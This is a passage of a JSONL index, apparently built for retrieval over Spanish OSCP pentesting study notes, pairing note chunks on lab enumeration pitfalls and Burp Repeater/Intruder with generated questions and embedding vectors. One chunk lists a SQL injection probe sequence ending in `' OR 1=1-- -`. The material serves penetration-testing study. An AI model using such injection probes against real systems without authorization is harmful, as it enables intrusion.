-0.03161, -0.01806, 0.0413, -0.15546, -0.00055, 0.1168, 0.00187, 0.11405, 0.05454, 0.02031, 0.04375, -0.01037, 0.01136, 0.05313, 0.07606, -0.0088, -0.04214, -0.00604, -0.07146, 0.14903, 0.01837, -0.10725, -0.0402, 0.09717, 0.03191, 0.00806, -0.06419, 1e-05, -0.03349, 0.01228, 0.0335, -0.04545, 0.02705, 0.01424, -0.06565, -0.02489, -0.00035, -0.00636, 0.01063, -0.00218, 0.00407, 0.08529, 0.04472, 0.07868, 0.04289, 0.01216, 0.00208, -0.0292, -0.01073, -0.13096, 0.05863, -0.09921, -0.02361, -0.08504, -0.02806, 0.13113, -0.06162, -0.07546, -0.02474, -0.06739, -0.04416, -0.11389, -0.01023, 0.00558, 0.04303, 0.01881, 0.06954, 0.07616, -0.07454, 0.02502, 0.05096, -0.05495, -0.04585, 0.03738, -0.05973, 0.03897, -0.10639, -0.07035, 0.02391, -0.00188, -0.00361, 0.04499, 0.05112, 0.06283, -0.00669, 0.06574, 0.07539, -0.03758, 0.02971, 0.05929, -0.00734, -0.06189, -0.03606, -0.06147, -0.02737, 0.07364, 0.07371, -0.04431, -0.07088, -0.05133, -0.03472, 0.00816, -0.00847, 0.01233, 0.05385, 0.00106, -0.00932, 0.01157, 0.01497, 0.05663, 0.05933, -0.00468, 0.04037, -0.04972, 0.0205, -0.00745, 0.02956, -0.02031, 0.01941, 0.09172, -0.06978, -0.05403, -0.02176, 0.07823, 0.0378, -0.04098, 0.01297, -0.05108, -0.02589, -0.015, 0.00176, 0.03801, 0.05953, 0.03725, -0.0488, -0.03561, -0.04631, 0.10134, -0.02517, -0.0252, 0.03933, 0.03283, 0.05227, 0.00271, -0.02068, -0.01718, -0.00757, -0.01391, -0.01726, -0.00505, 0.01563, 0.0462, -0.02936, -0.10708, -0.00589, 0.01849, 0.02395, -0.08619, 0.09372, 0.00733, -0.0239, -0.02659, 0.00736, -0.0349, -0.10207, 0.02279, -0.03463, -0.03921, 0.03537, 0.02154]} -{"tipo": "pregunta", "herramienta": "Trampas de enumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Trampas de enumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Trampas que cuestan horas (del lab real)\n- **IP del lab dinΓ‘mica**: el 3er octeto cambia al reiniciar (`.55 .65 .67...`). Haz `ip a` **antes** de escanear.\n- `filtered β‰  open` (firewall/sin respuesta).\n- `-Pn` en /24 = 256 \"up\" falsos. Úsalo solo en **1 host**.\n- Si `grep` no saca nada y el scan cubrΓ­a el puerto β†’ **la mΓ‘quina no estΓ‘ viva**.\n- **SNMP=UDP/161**, **SMTP=TCP/25**. No confundir.\n- `smbclient -L` **trunca** comentarios β†’ usa `rpcclient netshareenumall` (SMB).\n- Flags placeholder tipo `OS{0123456789abcdef}` = **seΓ±uelo** (grupo/recurso equivocado).\n\nRelacionado: Nmap Β· EnumeraciΓ³n Β· MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "cual es la diferencia entre un puerto abierto y uno que responde con firewall para detectar trampas?", "v": [-0.02537, 0.02223, -0.20748, -0.17656, -0.00624, -0.00176, 0.08875, 0.01419, -0.08423, -0.00933, 0.01901, 0.00349, -0.03534, -0.00373, 0.06594, -0.03561, -0.07429, 0.06195, 0.16758, -0.13354, -0.02089, -0.07864, 0.01621, -0.16084, -0.02347, -0.08551, -0.04717, -0.02705, -0.0579, -0.07381, 0.06703, 0.0079, 0.17303, -0.00339, -0.01455, 0.05777, 0.06356, 0.01092, 0.12433, 0.08556, 0.01824, 0.0062, -0.05431, 0.01709, 0.10561, -0.07902, -0.13597, -0.04738, 0.08765, 0.06169, -0.07162, -0.02447, -0.04083, -0.09599, -0.02836, -0.00231, 0.10546, 0.03327, 0.10379, -0.09664, -0.13192, -0.01588, 0.03144, -0.06433, -0.03057, -0.19601, -0.04707, -0.04731, -0.03471, -0.01, 0.0389, -0.01738, -0.05522, 0.05028, -0.02793, 0.03692, -0.04928, 0.02646, 0.09956, 0.10679, 0.02459, -0.02097, 0.02902, 0.02463, -0.04972, -0.07923, -0.08785, -0.02011, -0.00585, -0.07538, 0.08314, 0.09521, -0.09855, 0.11697, 0.01793, -0.10621, 0.0185, 0.07305, -0.04385, 0.03095, 0.0424, -0.00403, -0.17334, 0.1083, 0.02304, 0.06178, -0.07452, -0.11074, 0.01608, -0.10324, 0.02992, 0.00632, 0.01535, -0.05008, -0.02974, -0.05914, -0.03731, -0.01233, 0.08939, 0.00175, -0.1155, -0.03483, -0.15788, -0.00024, 0.05255, -0.03769, 0.07107, 0.04991, 0.00826, 0.09852, 0.00034, -0.06285, -0.1037, -0.05702, -0.01767, -0.00735, -0.01622, -0.07489, -0.04965, 0.0267, 0.01793, 0.05056, 0.00559, -0.02747, 0.0653, 0.02886, -0.06855, -0.11633, -0.12688, 0.01407, -0.00686, 0.0375, -0.02351, 0.06446, -0.06157, -0.01173, 0.03868, -0.01845, -0.03033, 0.12879, 0.02331, 0.02602, -0.02153, -0.00868, 0.03952, -0.01797, -0.07366, 0.00623, 0.07173, -0.02543, -0.07489, 0.06665, -0.03439, -0.00015, -0.02207, 0.00807, -0.05156, -0.00659, -0.03639, -0.06462, -0.02527, -0.01937, -0.02131, -0.06184, -0.02826, -0.0702, -0.0349, -0.0299, -0.03073, 0.11404, 0.0741, -0.03187, -0.04868, 0.00893, -0.0487, -0.00614, 0.05075, -0.06482, 0.01429, 0.04489, -0.03059, 0.00123, 0.01055, -0.03688, 0.01112, 0.03325, -0.05653, 0.01026, 0.04874, 0.077, 0.11464, 0.02592, 0.02278, -0.03091, -0.05094, 0.03522, -0.00921, 0.05192, 0.03788, 0.03859, -0.00586, 0.11413, 0.01495, 0.01333, -0.03044, -0.00837, -0.03937, 0.0439, 0.08807, 0.00301, 0.00014, -0.01601, -0.00183, 0.01268, 0.00652, -0.00594, -0.00166, -0.05374, 0.00775, -0.08531, 0.00481, 0.0019, 0.01777, -0.05533, 0.02161, -0.02124, -0.04454, 0.03617, 0.00914, -0.06123, -0.11006, 0.02483, 0.01919, -0.03473, 0.00677, -0.00056]} -{"tipo": "pregunta", "herramienta": "Trampas de enumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Trampas de enumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Trampas que cuestan horas (del lab real)\n- **IP del lab dinΓ‘mica**: el 3er octeto cambia al reiniciar (`.55 .65 .67...`). Haz `ip a` **antes** de escanear.\n- `filtered β‰  open` (firewall/sin respuesta).\n- `-Pn` en /24 = 256 \"up\" falsos. Úsalo solo en **1 host**.\n- Si `grep` no saca nada y el scan cubrΓ­a el puerto β†’ **la mΓ‘quina no estΓ‘ viva**.\n- **SNMP=UDP/161**, **SMTP=TCP/25**. No confundir.\n- `smbclient -L` **trunca** comentarios β†’ usa `rpcclient netshareenumall` (SMB).\n- Flags placeholder tipo `OS{0123456789abcdef}` = **seΓ±uelo** (grupo/recurso equivocado).\n\nRelacionado: Nmap Β· EnumeraciΓ³n Β· MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "que herramienta debo usar para obtener todas las comparticiones de red sin que se corten los comentarios?", "v": [-0.09129, 0.03925, -0.14697, -0.13177, 0.01229, -0.12035, -0.03817, -0.02066, -0.01621, -0.09641, -0.2026, -0.10459, -0.0739, -0.11308, 0.07471, -0.01757, 0.06338, 0.00011, 0.01806, -0.06378, 0.01597, -0.03273, -0.00221, 0.00632, -0.08533, 0.05034, 0.14409, -0.05171, -0.11572, 0.12859, 0.00635, -0.01563, 0.05551, -0.00973, -0.09612, -0.04812, 0.01145, 0.06641, -0.04628, 0.06052, -0.03462, -0.03783, -0.17002, 0.0904, -0.00792, -0.0136, -0.06814, 0.12834, -0.0603, 0.12844, -0.06061, -0.11393, -0.14824, -0.02236, -0.05455, -0.11929, 0.15408, -0.04739, -0.08026, -0.08355, -0.01965, 0.03551, -0.07643, 0.03204, 0.06238, -0.08049, -0.0077, -0.02857, -0.12152, 0.17983, 0.02538, 0.08293, -0.00607, -0.02415, 0.06413, 0.05774, -0.03988, 0.02026, 0.04995, 0.05474, 0.07362, -0.01072, 0.00288, -0.00096, -0.04991, -0.10979, 0.15916, -0.06885, -0.01096, -0.06544, -0.04627, 0.02475, 0.00864, -0.0359, 0.01682, 0.03378, 0.0298, -0.02877, 0.00679, 0.0153, 0.19978, -0.03995, -0.02101, -0.02987, 0.02417, 0.05463, 0.0033, -0.028, 0.04307, 0.03482, 0.06493, 0.03423, -0.02552, -0.04892, -0.04598, 0.01372, -0.08802, -0.09804, -0.09755, -0.0594, 0.06072, 0.07233, -0.05564, -0.07691, 0.05244, -0.06857, -0.05248, 0.08101, -0.05123, -0.06363, -0.09454, -0.0075, -0.02002, -0.04535, -0.05057, -0.06269, 0.00043, -0.07565, -0.01865, -0.08832, 0.03401, 0.00278, -0.11764, -0.13649, 0.03034, 0.04551, 0.02826, -0.02411, -0.00463, -0.00567, 0.00312, 0.01102, -0.02536, -0.02126, -0.02693, 0.08317, 0.02425, -0.04433, -0.08636, 0.03306, -0.1245, -0.07071, 0.03726, -0.0317, 0.05115, -0.08328, 0.03686, -0.02343, 0.0985, 0.00494, 0.0882, 0.07528, -0.06825, -0.02007, -0.00924, -0.05156, -0.08384, -0.05465, -0.01246, -0.02729, 0.00993, 0.03371, -0.09135, -0.02104, 0.0046, -0.00479, 0.01189, 0.0107, 0.01488, 0.02575, -0.01965, -0.00083, 0.03457, 0.04189, 0.00628, -0.00197, -0.03627, -0.02211, 0.08322, -0.02915, -0.08492, 0.02958, -0.02352, -0.04141, 0.03727, 0.03747, -0.03869, 0.0112, -0.05378, 0.07815, 0.06602, -0.01101, 0.05968, -0.04567, -0.00708, -0.03078, 0.0587, 0.02704, -0.0158, -0.02568, 0.06666, 0.01525, -0.00032, 0.04417, -0.03703, 0.02964, 0.0042, -0.02564, 0.04051, 0.00994, 0.02579, 0.01286, -0.05107, -0.01039, -0.05178, -0.0564, 0.05493, 0.03364, -0.05026, -0.05628, -0.00203, 0.08061, -0.0166, -0.0114, -0.04326, -0.01374, -0.07228, -0.01474, -0.02709, -0.06297, 0.0215, -0.00122, 0.06932, -0.04589, 0.03381, 0.02139]} -{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Burp Repeater e Intruder\n\n> Las dos pestaΓ±as de trabajo de Burp Suite: **Repeater** para probar a mano, **Intruder** para automatizar.", "indexar": "con que programa puedo probar y editar peticiones HTTP manualmente?", "v": [0.18073, 0.17435, -0.12792, -0.12025, 0.09275, -0.05363, 0.07284, -0.02741, -0.04466, -0.0542, -0.09734, 0.08406, 0.03712, -0.11394, -0.02747, 0.00616, 0.08658, -0.11514, 0.07594, -0.01228, 0.05177, -0.0262, -0.07268, -0.02037, -0.06074, -0.03957, 0.10079, 0.03758, -0.11052, -0.09769, 0.03627, -0.03386, -0.0375, 0.07596, -0.09678, 0.01636, -0.03822, 0.0384, 0.01172, 0.08041, 0.00718, 0.03197, -0.01861, 0.03884, -0.02999, 0.0283, 0.0339, -0.03259, -0.05284, -0.12215, 0.00834, -0.02944, -0.15057, 0.03815, -0.0356, 0.04967, 0.21351, -0.18552, -0.00533, -0.06939, 0.06067, -0.02577, 0.0743, 0.04932, 0.08455, -0.02283, 0.00062, -0.02784, -0.12073, 0.15321, -0.0566, 0.02399, -0.01354, -0.05422, 0.06343, 0.02091, -0.0592, -0.06622, 0.03385, -0.02579, -0.0501, -0.02669, -0.02686, 0.08324, -0.09806, -0.07706, -0.04653, -0.08329, 0.02784, -0.07625, 0.11513, 0.03574, 0.01179, 0.04215, 0.03398, -0.07782, 0.11964, 0.0211, 0.04222, 0.02085, 0.01251, -0.0241, -0.0415, 0.05985, 0.02588, 0.08645, 0.10229, -0.00342, -0.00394, 0.0018, -0.01428, -0.00273, -0.0924, 0.04364, -0.02103, -0.01347, -0.10973, -0.02524, 0.01213, -0.08083, -0.0863, -0.06353, -0.11446, -0.0152, 0.05616, -0.02821, -0.03135, 0.10816, -0.00791, 0.02214, 0.02618, 0.04029, -0.05016, -0.02768, -0.02554, 0.01038, 0.00143, -0.03485, 0.02795, 0.00103, -0.03749, 0.10455, 0.02623, -0.0514, 0.08044, -0.01188, -0.05976, -0.05267, -0.01266, 0.03797, 0.03663, 0.01491, -0.01622, 0.07987, -0.11199, 0.00263, 0.04825, -0.07671, -0.04225, 0.12847, 0.00065, 0.04252, -0.00188, -0.00472, 0.04573, 0.02193, -0.10935, 0.00932, 0.08467, -0.01344, -0.054, 0.09983, -0.08325, -0.09799, -0.00953, -0.03809, -0.01742, -0.05939, 0.05016, -0.02731, -0.03868, 0.02145, 0.01299, -0.00197, -0.02172, -0.06645, 0.03871, 0.02371, 0.0829, 0.0456, 0.05449, 0.07659, -0.09175, 0.04668, 0.0175, 0.04155, -0.07852, 0.00012, 0.00219, -0.01597, -0.03636, -0.00898, 0.03414, -0.07627, 0.02524, 0.05707, -0.02328, 0.04051, 0.01737, 0.03717, 0.04041, -0.06489, 0.10315, -0.02467, -0.01347, 0.01092, 0.04664, 0.01095, -0.02636, 0.03173, -0.00062, 0.00058, 0.11912, 0.0139, 0.03133, -0.04948, 0.11294, 0.03041, 0.04336, 0.03535, -0.03802, 0.00593, -0.06823, -0.07316, 0.10405, 0.06083, 0.03589, -0.02847, -0.05483, -0.06628, 0.05074, 0.07269, -0.05904, -0.05551, 0.00111, -0.06131, -0.11583, 0.0031, 0.01954, -0.00953, -0.06478, 0.06964, 0.04696, -0.06729, 0.01149, -0.03793]} -{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Burp Repeater e Intruder\n\n> Las dos pestaΓ±as de trabajo de Burp Suite: **Repeater** para probar a mano, **Intruder** para automatizar.", "indexar": "cuΓ‘l es la alternativa libre a Burp Suite para hacer pruebas de intrusiΓ³n?", "v": [-0.08812, 0.03897, -0.20371, -0.06528, -0.07702, -0.03903, 0.00235, -0.13702, -0.02379, -0.06147, -0.11639, 0.00441, 0.00418, 0.04843, -0.0667, -0.12082, -0.06981, -0.03252, 0.02058, -0.00484, -0.02203, 0.07198, -0.06633, -0.01956, -0.05625, -0.00806, -0.09071, -0.00959, 0.07028, -0.05879, -0.02035, -0.0078, 0.08891, 0.00469, -0.07138, -0.10937, 0.05094, 0.06438, 0.06768, 0.03607, 0.04363, -0.04762, -0.03197, 0.15408, 0.03833, -0.11351, -0.02888, 0.11672, 0.00797, 0.04538, -0.1374, -0.04657, 0.01941, -0.00578, 0.08159, -0.12136, 0.06292, -0.08724, 0.003, -0.02507, -0.00816, 0.03587, 0.02847, 0.01199, 0.06849, -0.09269, 0.01709, -0.00895, 0.00713, 0.02887, -0.04473, -0.08645, 0.03269, -0.0717, -0.1826, -0.03735, -0.08658, -0.03555, 0.01773, 0.03893, 0.06692, -0.02647, -0.07036, 0.0102, -0.04868, -0.10409, 0.11117, -0.17472, -0.04534, 0.02919, 0.11713, 0.00142, 0.04508, 0.10818, 0.04678, -0.08301, 0.06654, 0.0876, 0.0266, 0.01712, 0.11691, 0.03831, -0.11828, 0.04315, -0.09966, -0.02117, -0.04932, 0.05445, -0.00996, -0.05605, -0.01593, 0.06926, -0.08871, -0.06036, -0.07954, -0.05012, -0.06447, -0.01313, -0.01595, -0.01724, -0.08555, -0.06001, -0.07607, -0.05944, -0.02921, -0.00277, 0.00563, -0.03557, 0.0004, 0.09177, -0.01887, 0.03841, -0.07125, -0.00082, -0.05966, -0.09248, -0.01724, -0.06624, -0.03867, 0.00812, 0.05445, 0.01395, 0.06059, -0.02466, 0.06229, 0.03131, -0.00373, -0.03169, -0.03406, 0.01301, -0.08852, 0.00784, -0.02416, 0.14206, -0.03245, -0.01186, -0.00335, -0.06036, -0.00479, 0.12562, -0.00883, 0.00746, -0.11169, 0.05401, 0.04715, -0.04681, -0.00739, -0.04633, -0.06709, 0.0379, -0.05274, 0.08451, 0.01225, -0.11443, 0.10297, 0.0382, 0.00203, -0.12908, -0.02246, -0.07246, -0.00937, 0.05397, -0.10386, -0.02381, 0.04295, -0.04811, 0.02689, 0.0437, 0.11263, 0.05961, -0.0405, 0.05845, -0.08017, -0.045, -0.00447, 0.006, 0.01, -0.10661, -0.01869, -0.00258, -0.11385, -0.08103, -0.02412, -0.06299, -0.0198, 0.0283, -0.00795, 0.04158, -0.03932, 0.06297, 0.06838, -0.00914, 0.15805, -0.051, -0.09413, 0.05496, 0.03491, 0.02175, -0.01712, -0.02603, 0.01594, 0.09554, 0.01729, 0.00789, -0.05889, 0.08424, 0.01621, 0.02233, -0.0257, 0.04596, 0.00525, 0.04034, 0.01629, 0.04156, 0.01945, -0.00558, -0.00423, 0.03418, -0.01458, -0.08733, 0.06321, 0.06335, -0.0758, -0.02523, -0.06208, -0.00257, -0.05211, 0.02548, 0.00232, -0.02264, -0.03929, 0.01608, -0.00821, -0.04005, 0.04531, -0.00494]} -{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Burp Repeater e Intruder\n\n> Las dos pestaΓ±as de trabajo de Burp Suite: **Repeater** para probar a mano, **Intruder** para automatizar.", "indexar": "quΓ© herramienta sirve para automatizar ataques de fuerza bruta en redes?", "v": [-0.06351, -0.02422, -0.22452, -0.18121, -0.00956, 0.03481, -0.04627, -0.02522, -0.00786, -0.05768, -0.04694, -0.0905, -0.02253, 0.06541, 0.09956, -0.02499, -0.00166, -0.10409, 0.03142, -0.05858, 0.0067, -0.08354, 0.02168, -0.10358, -0.14569, -0.02127, 0.0165, 0.11396, -0.25121, 0.01632, -0.02763, 0.05459, 0.12569, -0.05093, -0.01214, -0.03093, -0.00158, 0.13228, 0.10212, 0.08789, -0.03562, 0.07798, -0.16064, -0.05475, 0.10089, 0.09007, -0.04564, -0.01454, 0.01271, 0.06086, -0.06076, -0.12007, -0.14093, -0.07059, -0.10523, -0.16989, 0.11899, -0.14774, -0.03114, -0.01787, -0.08714, 0.02512, -0.06235, -0.04522, -0.02147, -0.04778, -0.00403, -0.04567, -0.04343, 0.06578, -0.06193, 0.0074, -0.0114, -0.00151, -0.00252, 0.06662, 0.00461, 0.09655, -0.0021, 0.01244, -0.01855, 0.02211, -0.16153, -0.02637, -0.08154, -0.03183, 0.09027, -0.05762, -0.05215, -0.07879, 0.00867, 0.02581, -0.01694, -0.01743, 0.00686, 0.05038, -0.01354, -0.11859, -0.00942, -0.07918, 0.03963, -0.10056, -0.08257, 0.0113, 0.04759, -0.01203, -0.07132, 0.00051, -0.01681, -0.0591, 0.02554, -0.01488, -0.01987, 0.03106, -0.00096, 0.04699, -0.05181, -0.04598, 0.00838, -0.01518, -0.03819, 0.03783, -0.03616, 0.02254, -0.02028, 0.06833, 0.0108, 0.08734, 0.01246, -0.16838, 0.03104, 0.00304, 0.00548, -0.03121, -0.00254, -0.03098, 0.00054, -0.1832, -0.06247, -0.12418, -0.01888, 0.08008, -0.02964, -0.12101, 0.06671, 0.07136, 0.04865, -0.07058, -0.05786, 0.02188, 0.08146, -0.05354, 0.01518, 0.02578, -0.06354, 0.03884, -0.04651, -0.04046, -0.10185, 0.0487, -0.01734, -0.0785, -0.06961, 0.00196, -0.02962, 0.02609, -0.05788, 0.03317, 0.06768, 0.05189, 0.00612, 0.04975, 0.05574, 0.00439, -0.01211, -0.03034, -0.04907, 0.04618, -0.0286, -0.0135, -0.03672, -0.06096, -0.0296, -0.00266, 0.02389, -0.01308, 0.09124, -0.03398, 0.02035, 0.0442, -0.03912, 0.00681, -0.03155, 0.01957, 0.07319, -0.04295, -0.05481, -0.00425, 0.04546, -0.01127, -0.01309, -0.0623, -0.01998, -0.01841, 0.02588, 0.09226, 0.03695, -0.07631, -0.00484, 0.03864, 0.0094, -0.01094, 0.04317, -0.06452, -0.0491, -0.03916, 0.02372, -0.00225, 0.01227, -0.01569, 0.01505, -0.00841, -0.01022, 0.01529, -0.01681, 0.04787, -0.00961, -0.08791, 0.02299, -0.00365, 0.01083, -0.09021, -0.02576, 0.00177, -0.03424, -0.0706, 0.03502, 0.01763, -0.09086, 0.00091, -0.03815, 0.0324, 0.00365, -0.05505, -0.0571, -0.05116, -0.05638, -0.04252, -0.04274, -0.05351, -0.02485, 0.02821, 0.05886, 0.00462, 0.00217, -0.01683]} -{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Repeater (manual, tu favorito en OSCP)\n- `Ctrl+R` envΓ­a una peticiΓ³n capturada aquΓ­.\n- Editas cualquier parte (param, header, cookie, body) y **Send** β†’ ves la respuesta al instante.\n- Ideal para iterar payloads de SQL injection, Command injection, SSTI, Directory traversal sin recargar el navegador.\n- Flujo: marca la peticiΓ³n sospechosa β†’ `Ctrl+R` β†’ prueba `'`, luego `' OR 1=1-- -`, observa el cambio.", "indexar": "que programa sirve para iterar payloads de inyecciΓ³n sin recargar el navegador?", "v": [0.1886, -0.00879, -0.18597, -0.12649, 0.11398, -0.02774, 0.07582, -0.02189, 0.03461, -0.04593, -0.07303, -0.04876, 0.04653, -0.02791, -0.08925, 0.10169, -0.0636, 0.03287, 0.00334, 0.0153, 0.0191, 0.06595, 0.0092, -0.09965, 0.00091, 0.21438, -0.13498, 0.04187, -0.18834, -0.03324, -0.0683, 0.01771, 0.1653, -0.07428, -0.04177, 0.04134, 0.05253, 0.04857, 0.02336, 0.04269, 0.02077, 0.05215, -0.11098, 0.07202, 0.04157, 0.03869, 0.15112, -0.03501, 0.07745, -0.10042, 0.0289, 0.10099, -0.01925, 0.06281, -0.05163, -0.03021, 0.0694, -0.11077, -0.04633, -0.00945, 0.04809, 0.06701, 0.0126, -0.07185, 0.00339, -0.03125, 0.01816, 0.02753, -0.02078, -0.09383, 0.02043, -0.00584, 0.04608, 0.01647, -0.00335, 0.00037, -0.0326, 0.05963, 0.10652, 0.10499, 0.12269, -0.01516, -0.0561, 0.06401, -0.00179, 0.02893, 0.08325, 0.00116, 0.09759, -0.07389, 0.08061, 0.07596, -0.05074, 0.12939, -0.0327, -0.02443, 0.12113, -0.01355, 0.07532, 0.03935, 0.10981, -0.0788, 0.08265, 0.05177, 0.05572, 0.09065, 0.05108, -0.17896, 0.06985, 0.00755, 0.13597, -0.08272, 0.00199, -0.08937, -0.0577, 0.01662, -0.00299, 0.05107, -0.03931, -0.10933, -0.12778, 0.00412, -0.04696, 0.03021, 0.07104, 0.0022, -0.12206, 0.04312, 0.03629, 0.04149, 0.0398, 0.05077, 0.02505, 0.02991, -0.05944, -0.09671, 0.03332, -0.04074, -0.04899, 0.02943, 0.13353, 0.07075, 0.05126, 0.04541, 0.03663, 0.02254, 0.02558, -0.05741, -0.00134, -0.0687, 0.01091, 0.03448, 0.03445, 0.01598, -0.03836, -0.02781, 0.07654, -0.00255, -0.0216, 0.05106, -0.0271, 2e-05, 0.00911, 0.05715, -0.00809, -0.03209, -0.08149, -0.03514, 0.04794, 0.13378, 0.01857, 0.02431, 0.03085, -0.04705, 0.00282, -0.01471, -0.02903, -0.03278, 0.0825, 0.01004, -0.08056, 0.01005, 0.00257, 0.07296, -0.05824, -0.07197, -0.10898, 0.02774, 0.02507, -0.00266, -0.00298, -0.00688, -0.04595, -0.06793, 0.02886, -0.01371, -0.06654, 0.02503, 0.04017, 0.01832, 0.02866, -0.04081, -0.0207, -0.00924, 0.00403, 0.01907, -0.04129, -0.01152, 0.04387, 0.03631, 0.013, -0.06616, 0.09434, 0.00876, -0.03527, -0.09019, 0.00942, -0.00742, 0.00435, 0.07105, -0.00395, -0.02283, 0.02151, 0.00711, 0.0084, -0.01425, 0.06664, -0.00736, 0.02512, 0.02897, -0.02178, 0.02143, -0.05584, 0.00869, 0.07414, 0.01243, -0.02966, 0.02791, -0.08333, -0.04899, -0.00197, 0.00317, -0.03616, -0.05141, -0.01014, 0.00559, -0.04179, -0.01315, -0.00363, -0.01011, -0.02767, 0.1044, 0.0237, -0.01035, 0.03177, 0.04756]} -{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Repeater (manual, tu favorito en OSCP)\n- `Ctrl+R` envΓ­a una peticiΓ³n capturada aquΓ­.\n- Editas cualquier parte (param, header, cookie, body) y **Send** β†’ ves la respuesta al instante.\n- Ideal para iterar payloads de SQL injection, Command injection, SSTI, Directory traversal sin recargar el navegador.\n- Flujo: marca la peticiΓ³n sospechosa β†’ `Ctrl+R` β†’ prueba `'`, luego `' OR 1=1-- -`, observa el cambio.", "indexar": "con que puedo editar headers y cookies en una peticiΓ³n capturada y ver la respuesta al instante?", "v": [-0.01366, 0.08433, -0.08598, -0.07174, 0.03067, -0.14619, -0.01125, 0.12455, 0.01534, -0.01663, -0.07859, -0.03334, -0.02776, 0.01321, -0.00766, -0.05211, 0.14926, 0.18999, 0.12414, -0.09272, 0.08486, -0.07054, -0.04006, 0.05523, 0.00868, 0.01731, 0.10596, 0.13195, -0.03661, -0.17367, -0.02962, -0.06787, -0.075, 0.08072, -0.10262, -0.03135, -0.09142, 0.05888, 0.03189, 0.08654, -0.04578, 0.04279, 0.04738, -0.03204, -0.03265, -0.08463, 0.02774, 0.09783, 0.08045, -0.0166, 0.15769, -0.04248, -0.17128, 0.10006, -0.19042, 0.1412, 0.14445, -0.143, 0.03358, -0.02319, -0.09266, 0.03893, 0.0046, 0.07129, 0.06254, -0.04478, -0.03738, -0.06412, 0.09483, 0.02545, 0.02976, 0.00671, 0.08037, -0.09817, 0.08744, 0.00931, -0.04777, 0.03537, -0.05185, 0.07692, -0.04459, -0.04753, -0.05705, -0.02238, 0.03623, 0.04387, -0.10072, -0.09282, -0.02067, -0.10735, 0.07037, 0.10561, -0.04777, -0.04153, -0.03332, -0.06345, 0.00241, -0.07033, 0.05659, 0.00752, 0.04738, 0.01778, -0.09818, 0.08047, 0.00236, -0.05756, -0.0149, -0.10238, -0.04289, 0.01882, -0.12436, 0.00746, -0.07044, -0.01401, 0.0282, 0.07537, -0.05022, 0.01609, -0.05065, -0.03613, 0.03643, -0.08432, -0.04567, -0.06754, -0.01076, -0.01997, -0.09093, 0.01877, 0.04113, -0.02624, -0.09005, 0.0282, -0.01189, 0.01487, -0.06104, 0.04522, 0.07233, 0.02427, 0.03599, -0.05448, -0.05239, -0.01287, 0.03137, -0.04569, -0.01831, 0.01528, -0.09287, 0.00329, -0.02508, -0.13743, 0.05367, -0.076, -0.00896, -0.00219, 0.02776, 0.06006, 0.04146, 0.00553, -0.02383, -0.01223, -0.00786, 0.02441, -0.0668, -0.00818, 0.00802, -0.08914, -0.08585, -0.06475, 0.02809, 0.04344, -0.05228, -0.06671, -0.04788, 0.03406, 0.08923, 0.01058, 0.00716, -0.03106, -0.02357, -0.05277, -0.00906, 0.00023, 0.04066, 0.03745, -0.00143, -0.07864, 0.08966, 0.08371, -0.09002, 0.03425, 0.07061, -0.00684, -0.0111, -0.00822, 0.03339, 0.00124, -0.01207, 0.11613, 0.06008, 0.02994, 0.05838, -0.06109, 0.01447, 0.05979, -0.09947, 0.03469, -0.03367, 0.01471, 0.03583, -0.06601, -0.06107, 0.0939, 0.03291, -0.00474, 0.03181, -0.07819, 0.06256, 0.02641, -0.00033, 0.01045, 0.0108, 0.07586, 0.02811, 0.09558, -0.03463, 0.01957, -0.00946, 0.02661, -0.01214, 0.01363, -0.01234, 0.00896, -0.0046, -0.0016, 0.04717, 0.00053, -0.00372, -0.04815, -0.00892, -0.033, 0.01006, 0.02763, -0.05561, 0.03294, -0.01172, 0.04486, -0.05697, -0.00791, 0.03398, -0.01005, -0.05545, -0.02429, -0.02334, -0.01986, 0.00613, 0.02158]} -{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Repeater (manual, tu favorito en OSCP)\n- `Ctrl+R` envΓ­a una peticiΓ³n capturada aquΓ­.\n- Editas cualquier parte (param, header, cookie, body) y **Send** β†’ ves la respuesta al instante.\n- Ideal para iterar payloads de SQL injection, Command injection, SSTI, Directory traversal sin recargar el navegador.\n- Flujo: marca la peticiΓ³n sospechosa β†’ `Ctrl+R` β†’ prueba `'`, luego `' OR 1=1-- -`, observa el cambio.", "indexar": "cual es una alternativa manual a un repeater para pruebas de seguridad?", "v": [0.0543, 0.03811, -0.07194, -0.25819, -0.07082, -0.08109, -0.08587, 0.01148, -0.00321, -0.02723, -0.10032, -0.09748, 0.08121, 0.01683, 0.04469, -0.04496, -0.02932, -0.00315, 0.08667, -0.03215, -0.00117, -0.05983, -0.08644, -0.04335, 0.04681, 0.1284, 0.00448, 0.04614, -0.10409, -0.05274, -0.0071, 0.03651, 0.07873, -0.02248, -0.2281, 0.14088, 0.1378, 0.05204, 0.05804, 0.07578, -0.01615, -0.13733, -0.05306, 0.05632, 0.06232, 0.02563, -0.03893, 0.01978, -0.01443, 0.00153, -0.10768, -0.03398, -0.02511, 